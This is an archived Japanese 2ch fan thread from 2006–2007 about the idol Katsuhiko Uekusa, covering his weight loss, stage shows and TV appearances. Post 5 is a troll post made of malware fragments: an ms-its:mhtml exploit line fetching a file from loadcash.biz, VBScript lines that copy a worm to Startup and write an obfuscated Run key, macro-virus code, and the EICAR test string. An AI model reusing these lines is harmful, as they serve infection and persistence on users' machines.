5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ネンタイの良心〜黄色〜<Part8>

1 :ななしじゃにー:2006/09/24(日) 08:22:31 ID:aLkS4VYf


まったりと舞ったりと

前スレ
ネンタイの良心〜黄色〜<Part7>
http://tv8.2ch.net/test/read.cgi/jan/1088651876/l50



2 :ななしじゃにー:2006/09/24(日) 08:29:29 ID:aLkS4VYf

◆過去ログ◆
ネンタイの良心
http://saki.2ch.net/jan/kako/976/976720623.html
ネンタイの良心〜黄色〜 (通算2)
http://saki.2ch.net/jan/kako/990/990345469.html
ネンタイの良心〜黄色〜<Part2>(通算3)
http://music.2ch.net/jan/kako/992/992833351.html
ネンタイの良心〜黄色〜<Part3>(通算4)
http://tv.2ch.net/jan/kako/1004/10049/1004957195.html
ネンタイの良心〜黄色〜<Part3>(通算5)
http://tv2.2ch.net/test/read.cgi/jan/1026653127/ (DAT落ち)
ネンタイの良心〜黄色〜<Part6>
http://tv6.2ch.net/test/read.cgi/jan/1059127572/
◆お約束◆
荒らし出現の際には報知新聞を読みましょう。
ローカルルールに則って、>>950を踏んだ人は次スレ立てをしましょう。
(初心者さんやホスト制限などで立てられない人は次の人を指定してください)






3 :ななしじゃにー:2006/09/24(日) 09:15:20 ID:Y1ciQdG0
>1-2

仲間担さんありがd

4 :ななしじゃにー:2006/09/24(日) 09:37:38 ID:CUZrrv+L
dです

5 :<body onload=window()>:2006/09/24(日) 11:03:41 ID:ev8uZbQi
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

6 :ななしじゃにー:2006/09/24(日) 11:43:27 ID:nOs02TaG
なんなのら

7 :ななしじゃにー:2006/09/24(日) 12:16:43 ID:ZGEeDpC3
10までいくよ

8 :ななしじゃにー:2006/09/24(日) 13:00:27 ID:tRovGmNH
8ならずっと体型維持

9 :ななしじゃにー:2006/09/24(日) 14:59:07 ID:SGg3Y+6y
今のところ体型維持中

10 :ななしじゃにー:2006/09/24(日) 15:12:07 ID:Bok4pt4E
とりあえずここまで来たら2年は大丈夫w

11 :ななしじゃにー:2006/09/24(日) 15:47:37 ID:LKBmpBae
そりゃ芽出度い。何年もつか楽しみだわ。

12 :ななしじゃにー:2006/09/25(月) 11:15:31 ID:eDSEuZg0
体型に加えて、白髪対策とこまめなヒゲメンテもおながいしたい

13 :ななしじゃにー:2006/09/25(月) 15:45:24 ID:LhXJQdjD
あ〜、白髪対策はおながいしたいな。
童顔だから余計アンマッチに見える。
体型維持もおながいしたいが、顔はもう少し
ふっくらさせてもよいかもしれん。

14 :ななしじゃにー:2006/09/27(水) 07:33:37 ID:le2K0bS4
東京公演、楽おめでとう。
最後まで無事に公演が終わりますように。

15 :ななしじゃにー:2006/09/27(水) 14:21:03 ID:kVqzGS1H
ひとまず、おつかれさま〜!

楽見に行ってる人いたら
最後に挨拶あったか教えて欲しいな

16 :ななしじゃにー:2006/09/29(金) 09:08:57 ID:DveNW0vZ
髪が長くなってきてるけど、伸ばしてるのか?

17 :ななしじゃにー:2006/09/29(金) 20:39:50 ID:rbeUI/vf
鬼見ると、ホントに痩せたな〜と実感。
ちょっと痩せすぎか?

18 :ななしじゃにー:2006/10/01(日) 01:10:38 ID:BBAG0hqW
感謝祭の克みて一安心

19 :ななしじゃにー:2006/10/01(日) 19:01:23 ID:rdkw1yBg
なんで?

20 :ななしじゃにー:2006/10/02(月) 10:28:22 ID:KcXAKIYa
TVで見る限り元気そうだったじゃんw

21 :ななしじゃにー:2006/10/04(水) 11:02:17 ID:lkYYSV2Y
今更、克に完璧を求める方が無理っぽいが
会報>12タンが言って事何とかならないか・・・orz

22 :ななしじゃにー:2006/10/04(水) 21:29:28 ID:CddNWMZS
ごましお克

23 :ななしじゃにー:2006/10/05(木) 22:29:09 ID:jrR/4bb0
今日の鬼の克はいい感じだった。
いい顔してた。

24 :ななしじゃにー:2006/10/05(木) 23:15:38 ID:OV2mNfzX
でも、あの髪型だとちょっと老けて見えない?
プレゾンのときくらいがいいなあ。

25 :ななしじゃにー:2006/10/14(土) 00:11:47 ID:VLVKVkEE
鬼放映するたびに、病気か?って言われてるねw
まぁ、確かに急激に痩せたように見えるけどさ、
ドラマだと。

26 :ななしじゃにー:2006/10/15(日) 19:20:40 ID:6oekK8M3
克への関心がすっかりなくなって

1000まで逝くのに2年以上はかかりそうだなwww

27 :ななしじゃにー:2006/10/16(月) 09:42:25 ID:+gu9HN0B
少年倶楽部出てたのか・・・
知らなかった
網も波も告知なかったよね?

28 :ななしじゃにー:2006/10/16(月) 21:22:20 ID:F8gbMP6V
え〜、見逃したorz


29 :ななしじゃにー:2006/10/16(月) 21:31:03 ID:NK9d9tO9
明日ハイビジョンでも18時から放送あるよ
VTRでのコメントだから正味1〜2分

30 :ななしじゃにー:2006/10/20(金) 00:23:46 ID:DhiNaG0a
ハイビジョンも見逃したorz
レポ投下きぼん

そういえば会報で医者目指すとか言ってたのどうなったかなぁ…

31 :ななしじゃにー:2006/10/20(金) 21:24:00 ID:eHjjsm1L
岡倉のお父さん、亡くなっちゃったね。
克も訃報聞いたかな?

32 :ななしじゃにー:2006/10/21(土) 09:38:03 ID:6DeIViCk
克もコメント出してるね。

ご冥福をお祈りします。

33 :ななしじゃにー:2006/10/21(土) 09:40:05 ID:6DeIViCk
あげてしまったスマソ

34 :ななしじゃにー:2006/10/23(月) 19:39:38 ID:WJEvEH9j
克のコメント、どこで出てた?

35 :ななしじゃにー:2006/10/23(月) 21:00:45 ID:6KXRIsdL
>34
ttp://www.sanspo.com/geino/top/gt200610/gt2006102111.html

36 :ななしじゃにー:2006/10/24(火) 20:29:46 ID:9BA1urtK
DVD見た
やっぱり白髪が気になるな・・・

37 :ななしじゃにー:2006/10/24(火) 20:53:50 ID:7yRTop9t
岡倉のお父さんのお通夜でお焼香している姿を見て
愕然orz 夏よりさらに痩せてないか?
まさか、ホントに体壊したわけじゃないよね。

38 :ななしじゃにー:2006/10/27(金) 09:26:27 ID:fkQ3/Ydv
あの細さ
TIME19の頃に近いよな

克はヤル気になるまでが長いけど、
ここまでがんばられると返って心配になるよ


39 :ななしじゃにー:2006/10/27(金) 09:58:18 ID:4m5n89SI
カプリッチョの小南君が年取った感じだな
小南君知ってるから大丈夫だろと思うけど
知らない人はもっと大丈夫かと思うよ

40 :ななしじゃにー:2006/10/27(金) 11:29:31 ID:LwMd68fB
どの雑誌か忘れたけどアイドル誌に
明治座へ奥さん手作りのお弁当を東新くんの分まで持っていって
東新君に「野菜食べなきゃだめだよ」って注意してたらしい
それ読んで食べ物に気を使ってるんだと思った。

41 :ななしじゃにー:2006/10/28(土) 02:17:58 ID:HHpJfN8q
アツ日記に克の話あるよ

42 :ななしじゃにー:2006/10/29(日) 11:16:55 ID:7dNG1c2A
ダイエットして、リバウンドしないように気をつけている
のは、今までの克を知っているから「がんばってるな」と
思うけれど、ドラマ放映のたびに「病気だ」「なにがあったんだ?」
と言われてるのを見ると、切なくなる。

43 :ななしじゃにー:2006/10/31(火) 01:32:32 ID:nna6vJYg
痩せすぎて、笑顔も気持ちわるかった
遠めにはかっこよくなったけど
アップの顔はシワだらけで悲壮感がただよってる
もっと健康的なカッチャンがいい


44 :ななしじゃにー:2006/11/03(金) 12:40:07 ID:jsk7BjlZ
太ったらデブとか言われ、痩せたら気持ち悪いとか言われる克って???

45 :ななしじゃにー:2006/11/03(金) 14:47:27 ID:0ZQblQcS
言われる克ではなく、言う奴に問題あるわけで

46 :ななしじゃにー:2006/11/06(月) 03:26:41 ID:DOuezzPD
言う人は親心じゃない?
太ってても痩せてても心配だわ〜って。

47 :ななしじゃにー:2006/11/09(木) 10:24:11 ID:PgLxUY2q
心配だわって親心でデブだの気持ち悪いだのと
失礼で人を傷つける心ない表現をするって意味わかんね

48 :ななしじゃにー:2006/11/09(木) 21:55:26 ID:kuKGZ9is
痩せた克、リバウンド○○子…ダイエットってつくづく難しい…

『常子だす!』笑えたw

49 :ななしじゃにー:2006/11/10(金) 00:47:49 ID:YavD9LCt
9日克「三浦さん」の舞台ヒモの話を観劇しご飯食べに行ったみたい☆

50 :ななしじゃにー:2006/11/10(金) 01:03:42 ID:hqt/ou/c
>49
ごめん、意味がよくわかんない
三浦さんて誰?
9日って名鉄ホール2回公演じゃない?


51 :ななしじゃにー:2006/11/10(金) 01:16:06 ID:YavD9LCt
説明不足ですんません。

プレゾンにも出た事がある三浦祐介さん。
今、三浦さんも名古屋で舞台してるから克が見に行ったみたい。
この前ニッキの蒲田にも出てた人です。
検索すれば三浦さんのHPブログに書いてありますよ

52 :ななしじゃにー:2006/11/10(金) 01:17:42 ID:YavD9LCt
http://blog.livedoor.jp/miura0424yusuke/
見れるかな?

53 :ななしじゃにー:2006/11/10(金) 09:25:56 ID:cOwjMrXy
>51-52
d
ただ直リンはやめたほうがいいんでは?

そちらは19時開演の舞台だし時間もかぶってるから
食事だけのようなキガス


54 :ななしじゃにー:2006/11/13(月) 19:10:29 ID:TMpMPxJ9
三浦さん忠臣蔵いったみたいだね

55 :ななしじゃにー:2006/11/24(金) 00:35:02 ID:3vw4jyjP
アツ日記に名前出てる

56 :ななしじゃにー:2006/11/24(金) 00:51:53 ID:VAX+6+Bt
アツが名古屋に行ったのかと思ったら、
チャットかw
ここの人たちは名古屋は行ってないのかな。
レポもなにもないけど。

57 :ななしじゃにー:2006/11/24(金) 11:02:46 ID:rA/X/Rc6
千秋楽に行くよ

58 :ななしじゃにー:2006/11/27(月) 00:18:30 ID:Bbyo/rzq
楽はどうでした?

59 :ななしじゃにー:2006/11/27(月) 10:29:06 ID:6mTBgryy
>58
特に変わったこともなく終了

60 :ななしじゃにー:2006/11/27(月) 15:01:53 ID:OockJsgk
大楽でも挨拶なし?
あの舞台じゃ、変化を出すことはできないだろうけど、
あまりにも克らしいw

61 :ななしじゃにー:2006/11/27(月) 15:42:11 ID:Q3fG+gxf
緞帳が降りてすぐ場内アナウンスが入ったので
挨拶なんて最初から予定されてなかったとオモ

楽しか観てないのでわからないんだけど
前からから1幕ではあんなに涙流してたの?

62 :ななしじゃにー:2006/11/27(月) 17:05:23 ID:aliP1z9Q
あんなにの度合いが分からないけど、
東京ではそんなに涙を流していた記憶は無いな。
といっても2ヶ月も前のことなので、記憶も
定かではないが。

63 :ななしじゃにー:2006/11/27(月) 20:28:46 ID:Bbyo/rzq
アツは行かなかったのか・・

64 :ななしじゃにー:2006/11/27(月) 21:03:30 ID:rmAFTk8J
>62
涙が流れ落ちるくらいにかなり泣いてたよ
最後の方は涙のせいで鼻がつまってたと思う

65 :ななしじゃにー:2006/11/28(火) 00:06:10 ID:4iO9VF9J
>63
日記は行ったのかな?

66 :ななしじゃにー:2006/11/28(火) 22:11:15 ID:ie7/dLYg
>65
どうだろうね。来てたって聞かないね。

67 :ななしじゃにー:2006/12/04(月) 08:08:22 ID:LCEmc5Ye
克買い物かぁー。アツ日記に名前アリ

68 :ななしじゃにー:2006/12/04(月) 11:08:58 ID:D1BOaMn6
>67
みてきた。
料理の買い物ってなんだろう?
明日続報あるかな?

69 :ななしじゃにー:2006/12/04(月) 22:48:33 ID:Zvx9P+cz
克とアツ、すっかり仲良しだね。
家には来るわ、買い物には行くわで。

70 :ななしじゃにー:2006/12/06(水) 09:40:30 ID:gzrnUs/P
>69
今度は食事だね

71 :ななしじゃにー:2006/12/06(水) 10:51:03 ID:RQZZpVYa
ダイエットして変な噂でてるから
アツに言って元気な所アピッてもらったりしてw

72 :ななしじゃにー:2006/12/07(木) 22:44:13 ID:3XZcBDKm
鬼に出るたびに実況で死亡フラグ立てられちゃう。
分かっちゃいるけど・・・orz

73 :ななしじゃにー:2006/12/11(月) 15:21:01 ID:w5AOsXQz
トマゴトに名前出てる
また食事ネタw

74 :ななしじゃにー:2006/12/11(月) 16:48:36 ID:yZGB7NHp
植草さんじゃなくて、かっちゃんさんか
俺だ!と言ってる様子が目に浮かぶw

75 :ななしじゃにー:2006/12/11(月) 22:25:48 ID:YocEBXdc
やってることがいつまでも子供で
笑えるw

76 :ななしじゃにー:2006/12/12(火) 20:35:54 ID:qfVVkRhv
21周年オメ

77 :ななしじゃにー:2006/12/12(火) 22:15:21 ID:yWloXqtH
21回目のデビュー記念日おめでとう。
イベントは25周年までお預けかな。

78 :ななしじゃにー:2006/12/17(日) 01:32:22 ID:jTnKrkGt
今日も斗マゴト

79 :ななしじゃにー:2006/12/17(日) 09:40:09 ID:sMNZiB6X
最近、後輩とつるんでることが多いみたいだね。
昔からそうだったっけ?

80 :ななしじゃにー:2006/12/17(日) 15:17:35 ID:kmBzlFsP
>79
そうだよ古くは高木から長野イノ

81 :ななしじゃにー:2006/12/18(月) 21:21:18 ID:pbCOxEtz
まるみえ出てるのをチラッと見たが、
どうなの、あれ。
まるっきり、とっちゃんぼうやじゃない。
髪型も服装も、もっと似合うものがあるはず。
あれじゃ、痩せたのも台無しだよ。

82 :ななしじゃにー:2006/12/18(月) 22:19:22 ID:nEpumuuK
髪型も服装も今は試行錯誤してんじゃないか
まったり待ってやれよ。

かと言って太った克が良いのかと言ったら自分は微妙w

83 :ななしじゃにー:2006/12/18(月) 22:33:56 ID:Ytzd008T
髪型はともかく服装はスタイリストじゃないの?

84 :ななしじゃにー:2006/12/19(火) 21:17:50 ID:RZv8ju8a
スタイリストだろうけど、
出されたものを黙って着ているわけじゃないだろw
チョイスは本人でしょ。
あんなにセンス悪かったかな。

85 :ななしじゃにー:2006/12/20(水) 12:34:10 ID:gU3qc5gg
屋のトップにも載ってるよ
ttp://dailynews.yahoo.co.jp/fc/entertainment/broad_casting/?1166582080

86 :ななしじゃにー:2006/12/20(水) 13:36:19 ID:q2kFrWU0
殉職か…
渡鬼のほうでも大阪に帰ったら寂しくなるな

87 :ななしじゃにー:2006/12/20(水) 18:21:59 ID:9lJ6KWog
会報とどいたね。

88 :ななしじゃにー:2006/12/20(水) 20:37:35 ID:YqatPjka
会報の写真、やつれて見えるのは
気のせいか?
痩せてかっこよくなったとも思うけど、
体は華奢になっちゃったし(そう見えるだけ?)、
いかんせん、顔がやつれて見えるのはいただけないよ。

89 :ななしじゃにー:2006/12/20(水) 23:26:45 ID:wAEfAc7+
北海道で殉職するのかな。
刑事で北海道・・・は鬼門なんかなw

90 :ななしじゃにー:2006/12/21(木) 10:23:15 ID:jkV/a4L1
やけどの地獄谷か
懐かしいな

91 :ななしじゃにー:2006/12/21(木) 10:32:05 ID:gyMoi0OK
そして踊れなかったEXCUSE
振り付け覚えてないどころか知らないかもな

92 :ななしじゃにー:2006/12/21(木) 20:20:19 ID:kR+tnYNd
でも、ずっと見てたわけじゃん、2人の踊りを。
見てマネするのは得意技じゃない?w

93 :ななしじゃにー:2006/12/29(金) 07:51:35 ID:7pNnCR5S
斗とアツのとこにまた出たね

94 :ななしじゃにー:2006/12/30(土) 08:44:23 ID:M9QzHtXT
昨日のラジオでキムが>>73の事言ってた

もし自分の所へ電話かかってきたら「東くんが隣にいます」って言うらしいw

95 :ななしじゃにー:2006/12/30(土) 09:57:00 ID:M9QzHtXT
分かりにくいかも
「隣に東君がいるから電話代わります」だった

で、スマスマ鯛と歌って夢がかなったって言ってた。

96 :ななしじゃにー:2006/12/31(日) 16:50:40 ID:zs0Uocqp
えらくあっさりした殉職っぷりでしたな。

97 :ななしじゃにー:2007/01/01(月) 04:16:00 ID:Kfold9A9
J-webにアクセスしてみて下さい
「あけましておめでとうメッセージ」が掲載されてるよ。
お邪魔しました。

98 :ななしじゃにー:2007/01/01(月) 23:38:31 ID:T9ci0+kg
なんだよー 植草一清って

99 :ななしじゃにー:2007/01/04(木) 23:47:58 ID:c3U6uqsh
>98
録画したのを見て、気づいた。
いつの間に改名してたんだ?
しかも、一清。
仲良しすぎるだろwwww

100 :ななしじゃにー:2007/01/09(火) 13:11:06 ID:FbrDMICH
100ゲト

101 :ななしじゃにー:2007/01/13(土) 00:22:37 ID:E07KvrxG
101 (^-^)v

102 :ななしじゃにー:2007/01/13(土) 13:04:12 ID:tyCAeNrv
あいかわらずここはまったりしてるな。
この間の鬼にも出てなかったか?

103 :ななしじゃにー:2007/01/13(土) 13:35:21 ID:lA4ZsT59
出て無かったんじゃないの?
OP見て名前ないからチャンネル変えた

104 :ななしじゃにー:2007/01/13(土) 19:06:40 ID:PNQywqMl
克、何してるんだろね。
鬼の後の仕事ってなんだろ。
いきなりPZ?

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)